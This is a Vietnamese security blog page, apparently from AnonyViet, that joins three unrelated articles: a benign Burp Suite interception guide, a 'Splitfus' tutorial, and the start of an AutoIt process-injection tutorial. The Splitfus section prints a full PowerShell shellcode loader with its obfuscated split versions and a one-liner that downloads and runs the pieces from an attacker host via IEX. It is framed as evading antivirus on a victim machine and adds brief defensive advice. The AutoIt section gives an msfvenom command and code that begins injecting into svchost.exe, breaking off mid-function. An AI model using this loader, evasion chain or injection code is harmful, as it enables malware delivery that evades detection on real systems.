Khi làm việc với Web Security, việc quan sát và chỉnh sửa request HTTP là kỹ năng cực kỳ quan trọng. Đây là cách mà các chuyên gia bảo mật phát hiện lỗ hổng như SQL Injection, XSS, Authentication Bypass hoặc debug API.

Một trong những công cụ phổ biến nhất hiện nay là Burp Suite – bộ công cụ kiểm thử bảo mật web do PortSwigger phát triển.

Trong bài viết này, AnonyViet sẽ hướng dẫn bạn cách thiết lập Burp Suite để:

• Chặn toàn bộ lưu lượng web từ trình duyệt
• Phân tích request/response HTTP
• Giải mã lưu lượng HTTPS bằng TLS Certificate

Burp Suite là gì?

Burp Suite (thường gọi tắt là Burp) là một công cụ đồ họa giúp kiểm tra bảo mật ứng dụng Web.

Nó hoạt động như một proxy trung gian (MITM – Man in the Middle) giữa trình duyệt và máy chủ. Khi request đi qua Burp, bạn có thể:

• Xem toàn bộ request HTTP
• Chỉnh sửa tham số
• Phân tích header
• Replay request
• Kiểm thử bảo mật API

Burp Suite có nhiều phiên bản:

• Community Edition – miễn phí
• Professional – dành cho pentester
• Enterprise – kiểm thử bảo mật quy mô lớn

Bài viết này sử dụng phiên bản Community Edition.

Những gì chúng ta sẽ thực hiện

Để chặn lưu lượng bằng Burp Suite, bạn sẽ thực hiện 3 bước chính:

1. Tải và cài đặt Burp Suite
2. Cấu hình trình duyệt sử dụng proxy của Burp
3. Cài đặt chứng chỉ TLS để chặn HTTPS

Bước 1: Tải và cài đặt Burp Suite

Bạn có thể tải Burp Suite Community tại trang chính thức của PortSwigger:

https://portswigger.net/burp/communitydownload

Lưu ý:

• Burp Suite yêu cầu Java Runtime
• Hỗ trợ Windows, Linux và macOS

Sau khi cài đặt và mở Burp Suite, bạn sẽ thấy giao diện khởi tạo dự án:

Nếu không muốn lưu project:

• Nhấn Next
• Sau đó chọn Start Burp

Giao diện chính của Burp Suite sẽ xuất hiện:

Bước 2: Cấu hình Proxy cho trình duyệt

Để Burp có thể chặn request, trình duyệt phải gửi lưu lượng thông qua proxy của Burp.

Trong ví dụ này mình sử dụng Firefox.

Mở cài đặt:

about:preferences#general

Cuộn xuống phần Network Settings và nhấn Settings.

Thiết lập proxy như sau:

• Manual proxy configuration
• HTTP Proxy: 127.0.0.1
• Port: 8080
• Tick Use this proxy for all protocols

Sau đó nhấn OK.

Lúc này toàn bộ lưu lượng trình duyệt sẽ đi qua Burp.

Kiểm tra Proxy Listener của Burp

Mở Burp Suite:

• Proxy → Options

Đảm bảo Proxy Listener đang:

• Host: 127.0.0.1
• Port: 8080
• Trạng thái: Running

Test chặn lưu lượng HTTP

Truy cập trang HTTP đơn giản:

http://neverssl.com

Burp sẽ chặn request và hiển thị tại tab Intercept.

Bạn có thể:

• Xem header
• Sửa tham số
• Forward request
• Drop request

Tại sao HTTPS bị lỗi TLS?

Khi truy cập trang HTTPS như:

https://google.com

Bạn sẽ thấy lỗi TLS.

Nguyên nhân:

• HTTPS mã hóa dữ liệu bằng TLS
• Burp đang đứng giữa (MITM)
• Trình duyệt không tin chứng chỉ của Burp

Do đó chúng ta cần cài chứng chỉ CA của Burp.

Bước 3: Cài chứng chỉ Burp CA để chặn HTTPS

Mở trình duyệt và truy cập:

http://burp/

Nhấn CA Certificate.

Lưu file chứng chỉ.

Tiếp theo mở:

about:preferences

Tìm kiếm Certificates.

Chọn:

• View Certificates
• Authorities
• Import

Chọn file chứng chỉ Burp vừa tải.

Tick cả hai tùy chọn:

• Trust this CA to identify websites
• Trust this CA to identify email users

Nhấn OK.

Bây giờ bạn có thể chặn HTTPS mà không bị lỗi TLS.

Cách Burp Suite chặn request

Mở:

Proxy → Intercept

Khi bật Intercept is ON:

• Request dừng lại tại Burp
• Bạn có thể chỉnh sửa dữ liệu
• Sau đó nhấn Forward

Ví dụ khi đăng nhập một website:

Bạn sẽ thấy:

• HTTP headers
• Cookie
• POST data
• Token

Chỉnh sửa tham số request

Chuyển sang tab Params.

Tại đây bạn có thể:

• Sửa value
• Thêm tham số
• Xóa tham số

Đây là cách pentester kiểm tra logic của server.

Xem toàn bộ lịch sử request

Để xem tất cả request:

Proxy → HTTP History

Bạn sẽ thấy:

• Danh sách request
• Status code
• Domain
• Method (GET/POST)

Rất hữu ích khi phân tích API hoặc debug web app.

Use-case thực tế tại Việt Nam

Burp Suite thường được dùng để:

• Phân tích API mobile app
• Debug request của website
• Reverse engineer web service
• Kiểm thử bảo mật web

Nhiều bạn học Bug Bounty hoặc Web Pentest đều bắt đầu với Burp.

Nếu bạn mới học bảo mật web, nên kết hợp với nền tảng thực hành như:

• TryHackMe
• PortSwigger Web Security Academy

Lỗi thường gặp khi dùng Burp Suite

1. Không chặn được request

Nguyên nhân thường do:

• Proxy chưa cấu hình đúng
• Port sai
• Listener không chạy

2. HTTPS bị lỗi TLS

Chưa cài chứng chỉ Burp CA vào trình duyệt.

3. Website không tải

Do Intercept đang bật nhưng bạn chưa Forward request.

FAQ – Câu hỏi thường gặp

Burp Suite có miễn phí không?

Có. Burp Suite Community Edition miễn phí nhưng một số tính năng nâng cao chỉ có trong bản Professional.

Burp Suite có dùng để hack không?

Burp Suite là công cụ kiểm thử bảo mật hợp pháp. Nó được dùng bởi pentester và chuyên gia bảo mật để phát hiện lỗ hổng.

Có cần Java để chạy Burp Suite không?

Các phiên bản mới đã tích hợp runtime, tuy nhiên một số bản cũ vẫn yêu cầu Java.

Nên dùng trình duyệt nào với Burp?

Firefox thường được sử dụng vì dễ cấu hình proxy và certificate.

Checklist thiết lập Burp Suite

• Cài Burp Suite Community
• Cấu hình proxy 127.0.0.1:8080
• Kiểm tra Proxy Listener
• Tải chứng chỉ Burp CA
• Import vào Firefox
• Bật Intercept
• Phân tích request/response

Kết luận

Burp Suite là một công cụ cực kỳ quan trọng trong lĩnh vực Web Security. Việc biết cách chặn và phân tích lưu lượng HTTP/HTTPS giúp bạn hiểu rõ cách ứng dụng web hoạt động và phát hiện các vấn đề bảo mật.

Nếu bạn đang học Pentest, Bug Bounty hoặc phân tích API, việc thành thạo Burp Suite là kỹ năng gần như bắt buộc.

Trong các bài viết tiếp theo, AnonyViet sẽ hướng dẫn thêm về:

• Repeater
• Intruder
• Burp automation
• Khai thác lỗ hổng web thực tế

Nguồn tham khảo

• PortSwigger Web Security Academy
• TryHackMe
• Tài liệu Burp Suite Official

Splitfus là gì ?

Splitfus (viết tắt của Split + Obfuscation) là kỹ thuật mà hacker sử dụng để:

• Chia nhỏ (split) mã độc PowerShell thành nhiều đoạn, ví dụ: malware1.ps1, malware2.ps1, malware3.ps1,…
• Làm rối (obfuscate) từng đoạn mã để tránh bị phân tích hoặc phát hiện bởi chữ ký của AV
• Thực thi theo nhiều giai đoạn (staged execution): Khi thực hiện tấn công, máy nạn nhân sẽ tải từng đoạn mã từ máy chủ hacker và chạy trực tiếp trong bộ nhớ, thay vì lưu toàn bộ payload trên đĩa. Đây là kiểu thực thường được biết đến với tên gọi multi-stage attack hoặc fileless malware

Tại sao Splitfus hiệu quả trong việc vượt qua Antivirus ?

• Giảm khả năng bị phát hiện theo chữ ký (signature-based detection)
• AV truyền thống dựa vào chữ ký hoặc mẫu mã độc. Khi mã độc được chia nhỏ và mã hóa, không có đoạn nào chứa toàn bộ payload, khiến việc phát hiện trở nên khó khăn
• Tránh quét tĩnh và sandbox
  • Nếu toàn bộ payload nằm trong một file, AV dễ dàng phân tích trước khi chạy
  • Với Splitfus, mã độc được tải động (on-demand) từ máy chủ hacker, nên môi trường sandbox khó tái hiện được toàn bộ quy trình
• Bypass AMSI (Antimalware Scan Interface)
• AMSI của Windows có khả năng quét nội dung PowerShell trước khi thực thi. Tuy nhiên, với Splitfus:
  • Các đoạn mã nhỏ, obfuscated và tải động → khó bị AMSI phân tích đầy đủ
  • Nhiều hacker còn kết hợp AMSI bypass với Splitfus để tăng hiệu quả
• Linh hoạt và dễ cập nhật
• Hacker có thể thay đổi một đoạn bất kỳ trên máy chủ mà không cần phát tán lại toàn bộ payload. Điều này khiến việc truy vết hoặc phát triển chữ ký AV trở nên khó hơn

Phần lý thuyết đơn giản ngắn gọn vậy thôi, bây giờ mình sẽ lấy ví dụ thực tế cho bạn dễ hình dung hơn cách kỹ thuật được thực hiện

Ví dụ thực tế

Nhiều chiến dịch tấn công APT và malware framework như Cobalt Strike, PowerShell Empire, Metasploit đã áp dụng cơ chế tương tự Splitfus để phát tán payload staged. Đây là xu hướng phổ biến trong các cuộc tấn công fileless hiện nay.

Được rồi, bây giờ cùng mình thử chạy 1 đoạn code Powershell sau: Write-Host “Invoke-Mimikatz” . Ồ bạn thấy đấy, Antivirus đã phát hiện và chặn đoạn mã này. Đây là chỉ 1 đoạn mã in ra chuỗi trên terminal mà tại sao lại bị chặn nhỉ ? Bởi vì nó chứa chuỗi ký tự “Invoke-Mimikatz”. Đây là một chữ ký (signature) cực kỳ nổi tiếng và đặc trưng của công cụ tấn công Mimikatz

Như vậy, các AV được cấu hình để chặn ngay lập tức bất kỳ đoạn mã nào chứa chữ ký nguy hiểm này, ngay cả ở giai đoạn sớm nhất, nhằm ngăn chặn mọi ý đồ tiềm tàng liên quan đến Mimikatz. Đây là một biện pháp phòng ngừa rủi ro.

Vậy là chúng ta đã biết cách AV được cấu hình, giờ hãy thử tách chuỗi “Invoke-Mimikatz” thành nhiều chuỗi ngắn khác nhau.

Như bạn thấy, dù tách chuỗi thành các phần nhỏ như “Invo”, “ke”, “-Mim”, “ikatz”, AV vẫn không phát hiện ra đoạn mã độc. Sau đó, khi chúng ta nối lại các chuỗi này trong quá trình thực thi kết quả vẫn là “Invoke-Mimikatz” nhưng đã vượt qua được hệ thống phát hiện của AV. Đây chính là ví dụ đơn giản nhất của kỹ thuật Splitfus

Bây giờ chúng ta cùng xem 1 ví dụ khai thác thực tế hơn với đoạn code Powershell sau, với file tên là sc-original.ps1

[Byte[]] $shellcode = @(0x50, 0x51, 0x52, 0x53, 0x56, 0x57, 0x55, 0x6A, 0x60, 0x5A, 0x68, 0x63, 0x61, 0x6C, 0x63, 0x54,
0x59, 0x48, 0x83, 0xEC, 0x28, 0x65, 0x48, 0x8B, 0x32, 0x48, 0x8B, 0x76, 0x18, 0x48, 0x8B, 0x76,
0x10, 0x48, 0xAD, 0x48, 0x8B, 0x30, 0x48, 0x8B, 0x7E, 0x30, 0x03, 0x57, 0x3C, 0x8B, 0x5C, 0x17,
0x28, 0x8B, 0x74, 0x1F, 0x20, 0x48, 0x01, 0xFE, 0x8B, 0x54, 0x1F, 0x24, 0x0F, 0xB7, 0x2C, 0x17,
0x8D, 0x52, 0x02, 0xAD, 0x81, 0x3C, 0x07, 0x57, 0x69, 0x6E, 0x45, 0x75, 0xEF, 0x8B, 0x74, 0x1F,
0x1C, 0x48, 0x01, 0xFE, 0x8B, 0x34, 0xAE, 0x48, 0x01, 0xF7, 0x99, 0xFF, 0xD7, 0x48, 0x83, 0xC4,
0x30, 0x5D, 0x5F, 0x5E, 0x5B, 0x5A, 0x59, 0x58, 0xC3)

function LookupFunc {
Param ($moduleName, $functionName)
$assem = ([AppDomain]::CurrentDomain.GetAssemblies() | Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')[-1].Equals('System.dll')}).GetType('Microsoft.Win32.UnsafeNativeMethods')
$tmp = $assem.GetMethods() | ForEach-Object {If($_.Name -eq "GetProcAddress") {$_}}
$handle = $assem.GetMethod('GetModuleHandle').Invoke($null, @($moduleName));
[IntPtr] $result = 0;
try {
Write-Host "First Invoke - $moduleName $functionName";
$result = $tmp[0].Invoke($null, @($handle, $functionName));
}catch {
Write-Host "Second Invoke - $moduleName $functionName";
$handle = new-object -TypeName System.Runtime.InteropServices.HandleRef -ArgumentList @($null, $handle);
$result = $tmp[0].Invoke($null, @($handle, $functionName));
}
return $result;
}

function getDelegateType {
Param ([Parameter(Position = 0, Mandatory = $True)] [Type[]] $func,[Parameter(Position = 1)] [Type] $delType = [Void])
$type = [AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('ReflectedDelegate')), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMemoryModule', $false).DefineType('MyDelegateType','Class, Public, Sealed, AnsiClass, AutoClass', [System.MulticastDelegate])
$type.DefineConstructor('RTSpecialName, HideBySig, Public',[System.Reflection.CallingConventions]::Standard, $func).SetImplementationFlags('Runtime, Managed')
$type.DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $delType, $func).SetImplementationFlags('Runtime, Managed')
return $type.CreateType()
}

$lpMem = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((LookupFunc kernel32.dll VirtualAlloc),(getDelegateType @([IntPtr], [UInt32], [UInt32], [UInt32])([IntPtr]))).Invoke([IntPtr]::Zero, $shellcode.Length, 0x3000, 0x40)
[System.Runtime.InteropServices.Marshal]::Copy($shellcode, 0, $lpMem, $shellcode.Length)
[System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((LookupFunc kernel32.dll CreateThread),(getDelegateType @([IntPtr], [UInt32], [IntPtr], [IntPtr],[UInt32], [IntPtr])([IntPtr]))).Invoke([IntPtr]::Zero,0,$lpMem,[IntPtr]::Zero,0,[IntPtr]::Zero)

Đây là đoạn mã Powershell thực thi Shellcode của calc.exe trên Windows, nếu chúng ta thực thi toàn bộ đoạn mã này thì sẽ bị AV chặn. Và lúc này mình sẽ áp dụng kĩ thuật Splitfus. Trước tiên mình sẽ sử dụng công cụ Chimera để xáo trộn đoạn mã này trở nên khó đọc hơn với câu lệnh sau

./chimera.sh -f sc-original.ps1 -l 3 -v -t -s -b -j -o sc-obf.ps1

Giờ đây, đoạn mã Powershell ban đầu đã được làm rối bằng cách thay đổi biến. Tiếp theo, mình sẽ chia tệp này thành nhiều phần nhỏ hơn để thực thi một cách rời rạc, khiến hệ thống bảo mật không thể phát hiện ra chữ ký đặc trưng của shellcode

Tiếp theo, mình chia tệp sc-obf.ps1 thành 4 tệp riêng biệt: sc1.ps1 ( chứa biến lưu trữ Shellcode ), sc2.ps1 ( chứa hàm LookupFunc đã làm rối ), sc3.ps1 ( chứa hàm getDelegateType đã làm rối ) và sc4.ps1 ( chứa 3 dòng code cuối cùng ). Mỗi phần này nếu bị quét riêng lẻ sẽ không gây cảnh báo từ AV. Đây là đoạn code đã xáo trộn và tách ra riêng biệt từng file như mình nói

#sc1.ps1
[Byte[]] $LthwJuMUAmqvMRjAPliXdGwmLaXmjcSvILeKSAWVe = @(0x50, 0x51, 0x52, 0x53, 0x56, 0x57, 0x55, 0x6A, 0x60, 0x5A, 0x68, 0x63, 0x61, 0x6C, 0x63, 0x54,
0x59, 0x48, 0x83, 0xEC, 0x28, 0x65, 0x48, 0x8B, 0x32, 0x48, 0x8B, 0x76, 0x18, 0x48, 0x8B, 0x76,
0x10, 0x48, 0xAD, 0x48, 0x8B, 0x30, 0x48, 0x8B, 0x7E, 0x30, 0x03, 0x57, 0x3C, 0x8B, 0x5C, 0x17,
0x28, 0x8B, 0x74, 0x1F, 0x20, 0x48, 0x01, 0xFE, 0x8B, 0x54, 0x1F, 0x24, 0x0F, 0xB7, 0x2C, 0x17,
0x8D, 0x52, 0x02, 0xAD, 0x81, 0x3C, 0x07, 0x57, 0x69, 0x6E, 0x45, 0x75, 0xEF, 0x8B, 0x74, 0x1F,
0x1C, 0x48, 0x01, 0xFE, 0x8B, 0x34, 0xAE, 0x48, 0x01, 0xF7, 0x99, 0xFF, 0xD7, 0x48, 0x83, 0xC4,
0x30, 0x5D, 0x5F, 0x5E, 0x5B, 0x5A, 0x59, 0x58, 0xC3)

#sc2.ps1
function iRsUmgOEtIChVLeYYQcNrgKkLwHyChhaXKTDqfFcEs {
Param ($JzGCXcYJmJdQKoCerSqNXT, $LaHgzlZeSdXkwSwksNKHLbDEymlFp)
$FTNFeBumwTgCKnnMPmVEdfKoaWinKHpxBMujd = ([AppDomain]::CurrentDomain.GetAssemblies() | Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')[-1].Equals('System.dll')}).GetType('Microsoft.Win32.UnsafeNativeMethods')
$jWwCsHjXRPShPEyyEBpzOw = $FTNFeBumwTgCKnnMPmVEdfKoaWinKHpxBMujd.GetMethods() | ForEach-Object {If($_.Name -eq "GetProcAddress") {$_}}
$aFUfleAnufbxjgylCpxMoZnlpUkts = $FTNFeBumwTgCKnnMPmVEdfKoaWinKHpxBMujd.GetMethod('GetModuleHandle').Invoke($null, @($JzGCXcYJmJdQKoCerSqNXT));
[IntPtr] $XHcKpPqwXEaSejzfchayBW = 0;
try {
Write-Host "First Invoke - $JzGCXcYJmJdQKoCerSqNXT $LaHgzlZeSdXkwSwksNKHLbDEymlFp";
$XHcKpPqwXEaSejzfchayBW = $jWwCsHjXRPShPEyyEBpzOw[0].Invoke($null, @($aFUfleAnufbxjgylCpxMoZnlpUkts, $LaHgzlZeSdXkwSwksNKHLbDEymlFp));
}catch {
Write-Host "Second Invoke - $JzGCXcYJmJdQKoCerSqNXT $LaHgzlZeSdXkwSwksNKHLbDEymlFp";
$aFUfleAnufbxjgylCpxMoZnlpUkts = new-object -TypeName System.Runtime.InteropServices.HandleRef -ArgumentList @($null, $aFUfleAnufbxjgylCpxMoZnlpUkts);
$XHcKpPqwXEaSejzfchayBW = $jWwCsHjXRPShPEyyEBpzOw[0].Invoke($null, @($aFUfleAnufbxjgylCpxMoZnlpUkts, $LaHgzlZeSdXkwSwksNKHLbDEymlFp));
}
return $XHcKpPqwXEaSejzfchayBW;
}

#sc3.ps1
function DdKSsQGFmFfVhpHEtVzHaZFCWQGs {
Param ([Parameter(Position = 0, Mandatory = $True)] [Type[]] $GVUAdTXmnEpoFzPorhRfka,[Parameter(Position = 1)] [Type] $RRqnOWxmsxKutFBpzSBCMlckCOfBNELkuuJsUOnHsB = [Void])
$YPjndxTHFIcbnisDBdfZAiWWMORMQEMwWeH = [AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('ReflectedDelegate')), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMemoryModule', $false).DefineType('MyDelegateType','Class, Public, Sealed, AnsiClass, AutoClass', [System.MulticastDelegate])
$YPjndxTHFIcbnisDBdfZAiWWMORMQEMwWeH.DefineConstructor('RTSpecialName, HideBySig, Public',[System.Reflection.CallingConventions]::Standard, $GVUAdTXmnEpoFzPorhRfka).SetImplementationFlags('Runtime, Managed')
$YPjndxTHFIcbnisDBdfZAiWWMORMQEMwWeH.DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $RRqnOWxmsxKutFBpzSBCMlckCOfBNELkuuJsUOnHsB, $GVUAdTXmnEpoFzPorhRfka).SetImplementationFlags('Runtime, Managed')
return $YPjndxTHFIcbnisDBdfZAiWWMORMQEMwWeH.CreateType()
}

#sc4.ps1
$WCUBLvVuyTuTmQBWbcWjbjzYViRFjOXfFH = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((iRsUmgOEtIChVLeYYQcNrgKkLwHyChhaXKTDqfFcEs kernel32.dll VirtualAlloc),(DdKSsQGFmFfVhpHEtVzHaZFCWQGs @([IntPtr], [UInt32], [UInt32], [UInt32])([IntPtr]))).Invoke([IntPtr]::Zero, $LthwJuMUAmqvMRjAPliXdGwmLaXmjcSvILeKSAWVe.Length, 0x3000, 0x40)
[System.Runtime.InteropServices.Marshal]::Copy($LthwJuMUAmqvMRjAPliXdGwmLaXmjcSvILeKSAWVe, 0, $WCUBLvVuyTuTmQBWbcWjbjzYViRFjOXfFH, $LthwJuMUAmqvMRjAPliXdGwmLaXmjcSvILeKSAWVe.Length)
[System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((iRsUmgOEtIChVLeYYQcNrgKkLwHyChhaXKTDqfFcEs kernel32.dll CreateThread),(DdKSsQGFmFfVhpHEtVzHaZFCWQGs @([IntPtr], [UInt32], [IntPtr], [IntPtr],[UInt32], [IntPtr])([IntPtr]))).Invoke([IntPtr]::Zero,0,$WCUBLvVuyTuTmQBWbcWjbjzYViRFjOXfFH,[IntPtr]::Zero,0,[IntPtr]::Zero)

Các bước để thực hiện kĩ thuật Splitfus này cũng rất đơn giản. Đầu tiên, mình sử dụng lệnh sau để khởi tạo server Python trên cổng 80 với địa chỉ IP là 192.168.1.17:

python3 -m http.server 80

Server này sẽ lưu các file script PowerShell đã tách nhỏ và làm rối, cho phép máy nạn nhân tải xuống từng phần riêng biệt.

Cuối cùng mình tạo 1 đoạn lệnh thực thi ngắn gọn để thực thi trên máy nạn nhân

1..4 | ForEach-Object { IEX (New-Object System.Net.WebClient).DownloadString("http://192.168.1.17/sc$_.ps1") }

Lệnh này sẽ tải xuống và thực thi từng file script từ sc1.ps1 đến sc4.ps1. Đây là cách hiệu quả để vượt qua các cơ chế phát hiện mã độc vì mỗi phần riêng lẻ có thể trông vô hại. Khi kết hợp lại, chúng tạo thành một cuộc tấn công hoàn chỉnh mà nhiều giải pháp bảo mật không thể phát hiện

Với Metasploit, việc tạo shellcode trở nên dễ dàng hơn rất nhiều. Mình sẽ sử dụng lệnh msfvenom để tạo ra shellcode mới, sau đó thay thế vào script sc1.ps1. Điều này cho phép mình tùy biến cuộc tấn công theo nhiều hướng khác nhau, từ lấy quyền điều khiển máy tính nạn nhân đến đánh cắp thông tin hoặc cài đặt backdoor

https://streamable.com/rwoo4k

Và đó là những ví dụ đơn giản, nhưng thực tế, mã độc PowerShell không hề đơn giản như vậy. Các hacker sẽ phải dùng thêm kĩ thuật Bypass AMSI để tăng tỉ lệ thành công

Cách phòng thủ trước kỹ thuật Splitfus

Kỹ thuật Splitfus là một trong những phương pháp tấn công bằng PowerShell tinh vi, khó phát hiện nếu hệ thống không được giám sát chặt chẽ. Để phòng thủ hiệu quả trước Splitfus, đội ngũ an ninh mạng cần triển khai đồng bộ nhiều biện pháp chủ động, từ việc giám sát hành vi cho đến xây dựng hệ thống cảnh báo sớm và đào tạo người dùng cuối.

 Tăng cường giám sát PowerShell

PowerShell là công cụ thường bị lạm dụng trong các cuộc tấn công hiện đại. Để theo dõi hoạt động bất thường, hệ thống cần bật tính năng ghi nhật ký Script Block Logging (sử dụng Event ID 4104) kết hợp với Module Logging. Những thiết lập này giúp lưu lại toàn bộ lệnh PowerShell đã được thực thi, kể cả khi đã bị làm rối mã (obfuscate). Ngoài ra, nên kích hoạt chế độ Constrained Language Mode để hạn chế việc sử dụng các lệnh nguy hiểm trong môi trường thực thi PowerShell.

Kích hoạt và bảo vệ AMSI (Antimalware Scan Interface)

AMSI là lớp phòng vệ quan trọng giúp phân tích mã trước khi được thực thi trong PowerShell. Việc đảm bảo AMSI luôn được bật và không bị vượt qua (bypass) là điều thiết yếu. Khi tích hợp cùng Microsoft Defender hoặc các giải pháp EDR có hỗ trợ quét AMSI, khả năng phát hiện mã độc bị làm rối sẽ được nâng cao rõ rệt, giúp ngăn chặn sớm các hành vi tấn công từ Splitfus.

Kiểm tra hành vi tải động trong hệ thống

Một đặc điểm thường thấy của Splitfus là sử dụng các tham số nguy hiểm trong PowerShell như EncodedCommand hoặc gọi hàm IEX để tải mã từ xa thông qua chuỗi như (New-Object Net.WebClient).DownloadString. Hệ thống EDR hoặc HIDS cần được cấu hình để nhận diện những hành vi này. Đồng thời, cần cảnh giác khi phát hiện script được tải về từ domain không đáng tin cậy, đặc biệt là các yêu cầu HTTP GET chứa tập tin đuôi .ps1.

Thiết lập kiểm soát truy cập mạng chặt chẽ

Kiểm soát truy cập mạng đóng vai trò quan trọng trong việc ngăn chặn Splitfus giao tiếp với máy chủ điều khiển (C2 server). Cần chủ động chặn các kết nối outbound đến địa chỉ IP hoặc domain nghi ngờ. Việc cấu hình proxy kết hợp với kiểm tra TLS (TLS inspection) sẽ giúp phát hiện các hành vi tải mã ẩn dưới kết nối được mã hóa. Bên cạnh đó, cập nhật liên tục các chỉ số tấn công (IOC) từ nguồn Threat Intelligence Feed sẽ nâng cao khả năng nhận diện và phản ứng kịp thời.

Cuối cùng, yếu tố con người luôn là mắt xích yếu nhất trong chuỗi phòng thủ. Việc tuyên truyền và đào tạo người dùng cuối nhằm nâng cao nhận thức bảo mật là điều bắt buộc. Nhân viên cần được hướng dẫn không chạy script từ các nguồn không rõ ràng. Đồng thời, kỹ năng nhận diện email giả mạo (phishing) cũng cần được chú trọng vì đây thường là điểm xuất phát của các cuộc tấn công Splitfus.

Câu hỏi thường gặp

Splitfus là gì và tại sao nó hiệu quả trong việc vượt qua Antivirus?

Splitfus là kỹ thuật hacker chia nhỏ mã độc PowerShell, làm rối code và thực thi từng phần. Điều này giúp giảm khả năng bị phát hiện dựa trên chữ ký, tránh quét tĩnh và sandbox, đồng thời bypass AMSI (Antimalware Scan Interface).

Kỹ thuật Splitfus hoạt động như thế nào trong thực tế?

Hacker chia mã độc thành nhiều đoạn nhỏ, mã hóa chúng và tải từng đoạn lên máy nạn nhân để thực thi. Việc này làm cho mã độc khó bị phát hiện hơn so với việc tải và thực thi một file mã độc lớn.

Có những công cụ nào hỗ trợ thực hiện kỹ thuật Splitfus?

Nhiều chiến dịch tấn công APT và framework malware như Cobalt Strike, PowerShell Empire, Metasploit sử dụng kỹ thuật tương tự Splitfus. Ngoài ra, các công cụ như Chimera có thể giúp làm rối mã nguồn PowerShell, hỗ trợ việc sử dụng kỹ thuật này.

Trong bài viết này, chúng ta sẽ cùng khám phá cách thực hiện kỹ thuật Shellcode Injection với AutoIt, từ những khái niệm cơ bản đến các bước thực hành cụ thể, nhằm giúp bạn hiểu sâu hơn về cách thức hoạt động của nó

Lưu ý: Bài viết này chỉ dành cho mục đích giáo dục, nghiên cứu và học tập. Anonyviet không chịu trách nhiệm trước mọi hành vi bất hợp pháp

Shellcode Injection là gì ?

Trước khi đi vào chi tiết, hãy cùng tìm hiểu khái niệm cơ bản. Shellcode là một đoạn mã nhị phân nhỏ, thường được viết bằng ngôn ngữ Assembly, nhằm mục đích thực thi một tác vụ cụ thể (như mở shell, tải phần mềm độc hại,…). Shellcode Injection là quá trình chèn đoạn mã này vào bộ nhớ của một tiến trình đang chạy, sau đó buộc tiến trình đó thực thi mã.

Với khả năng thao tác bộ nhớ và gọi các hàm API của Windows, Autoit là ngôn ngữ lập trình lý tưởng để thực hiện kỹ thuật này. Chúng ta sẽ tận dụng các hàm có sẵn trong các thư viện của Autoit để tương tác với hệ thống

Cách thực hiện kĩ thuật Shellcode Injection

1. Chuẩn bị môi trường

Để bắt đầu, bạn cần chuẩn bị những thứ sau:

• Tải và cài đặt AutoIt: Đảm bảo bạn có cả trình soạn thảo SciTE để viết code
• Shellcode: Bạn có thể tạo shellcode bằng các công cụ như Metasploit (msfvenom) hoặc tự viết bằng Assembly. Ví dụ, dùng lệnh sau trong Metasploit để tạo shellcode mở calculator

msfvenom -p windows/x64/exec CMD=calc.exe -f hex

Kết quả sẽ là một chuỗi hex như: fc4883e4…32e65786500

• Kiến thức cơ bản: Hiểu về hàm API Windows như VirtualAlloc, RtlMoveMemory, và CreateThread

2. Viết code Autoit thực hiện kĩ thuật Shellcode Injection

Phần khai báo thư viện

#include <Process.au3>
#include <Memory.au3>
#include <WinAPI.au3>
#include <Array.au3>

Đây là các thư viện (library) mà AutoIt sử dụng để cung cấp các hàm hỗ trợ:

• <Process.au3>: Hỗ trợ làm việc với tiến trình (process), như lấy tên, kiểm tra PID.
• <Memory.au3>: Cung cấp hàm để thao tác bộ nhớ, như cấp phát hoặc ghi dữ liệu.
• <WinAPI.au3>: Cho phép gọi các hàm API của Windows (như OpenProcess, WriteProcessMemory).
• <Array.au3>: Hỗ trợ làm việc với mảng (array), dùng để quản lý danh sách tiến trình.

Để dễ hiểu hơn bạn hãy nghĩ đây là những “cuốn sách hướng dẫn” mà chương trình cần để biết cách làm việc với hệ điều hành

Khai báo biến toàn cục

Global $hexShellcode = "fc4883e4...32e65786500"

$hexShellcode là shellcode dạng mã hexa (chuỗi số và chữ cái như fc4883e4f). Đây là đoạn mã nhỏ sẽ được tiêm vào tiến trình đích để thực thi

Gọi các hàm chính

_CheckProcess()
_ProcessInjection()

Hai hàm này chính là “đầu não” của chương trình:

•  _CheckProcess(): Kiểm tra xem tiến trình đích (svchost.exe) có đang chạy không
•  _ProcessInjection(): Thực hiện việc tiêm shellcode vào tiến trình svchost.exe

Hàm _CheckProcess()

Func _CheckProcess()
    ConsoleWrite("[+] Checking for target process" & @CRLF & @CRLF)

    Global $targetPID = Find_Process("svchost.exe")

    If Not $targetPID = 0 Then
        Global $targetProcName = _ProcessGetName($targetPID)
        ConsoleWrite("[+] Target process is running (" & $targetProcName &")" & @CRLF & @CRLF)
    ElseIf $targetPID = 0 Then
        ConsoleWrite("[!] Target process is not running. Exiting." & @CRLF & @CRLF)
        Exit
    EndIf
EndFunc

Hàm này kiểm tra xem tiến trình svchost.exe có đang chạy không và lấy mã định danh (PID) của nó

Chi tiết:

• ConsoleWrite(“[+] Checking for target process” & @CRLF & @CRLF): In thông báo “Đang kiểm tra tiến trình đích”
• $targetPID = Find_Process(“svchost.exe”): Gọi hàm Find_Process để tìm PID của svchost.exe
• If Not $targetPID = 0: Nếu tìm thấy PID (khác 0):

– $targetProcName = _ProcessGetName($targetPID): Lấy tên tiến trình từ PID (dùng thư viện <Process.au3>)

– In thông báo xác nhận tiến trình đang chạy

• ElseIf $targetPID = 0: Nếu không tìm thấy, in thông báo lỗi và thoát chương trình (Exit)

Hàm Find_Process()

Func Find_Process($process)
    $loggedInUser = @UserName
    $processList = ProcessList()
    Dim $matchingProcesses[1]

    For $i = 1 To $processList[0][0]
        $processName = $processList[$i][0]
        $processPID = $processList[$i][1]

        If StringInStr($processName, $process) And _IsProcessOwner($processPID, $loggedInUser) Then
